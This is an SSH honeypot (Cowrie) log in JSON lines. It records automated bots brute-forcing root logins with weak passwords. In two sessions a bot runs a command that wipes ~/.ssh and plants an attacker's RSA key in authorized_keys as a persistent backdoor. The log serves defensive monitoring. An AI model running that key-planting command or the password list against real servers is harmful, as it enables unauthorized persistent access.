{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:17:11.173022Z","src_ip":"195.154.203.16","session":"4cb7f59bb16b"}
{"eventid":"cowrie.session.connect","src_ip":"195.154.203.16","src_port":59600,"dst_ip":"1.2.3.4","dst_port":22,"session":"004a89688878","protocol":"ssh","message":"New connection: 195.154.203.16:59600 (1.2.3.4:22) [session: 004a89688878]","sensor":"my-vps","timestamp":"2025-08-28T16:17:11.227824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:17:11.229825Z","src_ip":"195.154.203.16","session":"004a89688878"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-28T16:17:11.294418Z","src_ip":"195.154.203.16","session":"004a89688878"}
{"eventid":"cowrie.login.success","username":"root","password":"debian","message":"login attempt [root/debian] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:17:11.431142Z","src_ip":"195.154.203.16","session":"004a89688878"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46718,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d1b4fe83202","protocol":"ssh","message":"New connection: 212.227.235.229:46718 (1.2.3.4:22) [session: 0d1b4fe83202]","sensor":"my-vps","timestamp":"2025-08-28T16:17:18.370170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:17:18.371027Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:17:18.676795Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.login.success","username":"root","password":"P2ssw0rd","message":"login attempt [root/P2ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:17:19.941263Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:17:20.569780Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:17:20.570505Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:17:20.571467Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:17:20.878242Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:17:21.545097Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:17:21.545992Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:17:21.854943Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:17:21.855844Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44976,"dst_ip":"1.2.3.4","dst_port":22,"session":"aca6ac7dcf97","protocol":"ssh","message":"New connection: 212.227.235.229:44976 (1.2.3.4:22) [session: aca6ac7dcf97]","sensor":"my-vps","timestamp":"2025-08-28T16:17:22.171860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:17:22.172699Z","src_ip":"212.227.235.229","session":"aca6ac7dcf97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:17:22.489173Z","src_ip":"212.227.235.229","session":"aca6ac7dcf97"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:17:23.757359Z","src_ip":"212.227.235.229","session":"aca6ac7dcf97"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:17:25.082649Z","src_ip":"212.227.235.229","session":"aca6ac7dcf97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44980,"dst_ip":"1.2.3.4","dst_port":22,"session":"ace31cd2e5a7","protocol":"ssh","message":"New connection: 212.227.235.229:44980 (1.2.3.4:22) [session: ace31cd2e5a7]","sensor":"my-vps","timestamp":"2025-08-28T16:17:25.394909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:17:25.395783Z","src_ip":"212.227.235.229","session":"ace31cd2e5a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:17:25.711710Z","src_ip":"212.227.235.229","session":"ace31cd2e5a7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:17:27.017406Z","src_ip":"212.227.235.229","session":"ace31cd2e5a7"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:17:27.334697Z","src_ip":"212.227.235.229","session":"0d1b4fe83202"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:17:27.335506Z","src_ip":"212.227.235.229","session":"ace31cd2e5a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42000,"dst_ip":"1.2.3.4","dst_port":22,"session":"13993ac17449","protocol":"ssh","message":"New connection: 212.227.235.229:42000 (1.2.3.4:22) [session: 13993ac17449]","sensor":"my-vps","timestamp":"2025-08-28T16:18:41.747631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:18:41.748458Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:18:42.062753Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.login.success","username":"root","password":"123mudar","message":"login attempt [root/123mudar] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:18:43.359822Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:18:44.009768Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:18:44.010563Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:18:44.011364Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:18:44.326981Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:18:45.417676Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:18:45.418366Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:18:45.735801Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:18:45.736998Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42002,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa3d6f7a137a","protocol":"ssh","message":"New connection: 212.227.235.229:42002 (1.2.3.4:22) [session: aa3d6f7a137a]","sensor":"my-vps","timestamp":"2025-08-28T16:18:46.050839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:18:46.051824Z","src_ip":"212.227.235.229","session":"aa3d6f7a137a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:18:46.366626Z","src_ip":"212.227.235.229","session":"aa3d6f7a137a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:18:47.667298Z","src_ip":"212.227.235.229","session":"aa3d6f7a137a"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:18:48.984780Z","src_ip":"212.227.235.229","session":"aa3d6f7a137a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42010,"dst_ip":"1.2.3.4","dst_port":22,"session":"810567cb6351","protocol":"ssh","message":"New connection: 212.227.235.229:42010 (1.2.3.4:22) [session: 810567cb6351]","sensor":"my-vps","timestamp":"2025-08-28T16:18:49.297341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:18:49.298030Z","src_ip":"212.227.235.229","session":"810567cb6351"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:18:49.612334Z","src_ip":"212.227.235.229","session":"810567cb6351"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:18:50.915735Z","src_ip":"212.227.235.229","session":"810567cb6351"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:18:51.234059Z","src_ip":"212.227.235.229","session":"13993ac17449"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:18:51.234968Z","src_ip":"212.227.235.229","session":"810567cb6351"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33362,"dst_ip":"1.2.3.4","dst_port":22,"session":"099d131bbcab","protocol":"ssh","message":"New connection: 212.227.235.229:33362 (1.2.3.4:22) [session: 099d131bbcab]","sensor":"my-vps","timestamp":"2025-08-28T16:19:06.779442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:19:06.859940Z","src_ip":"212.227.235.229","session":"099d131bbcab"}
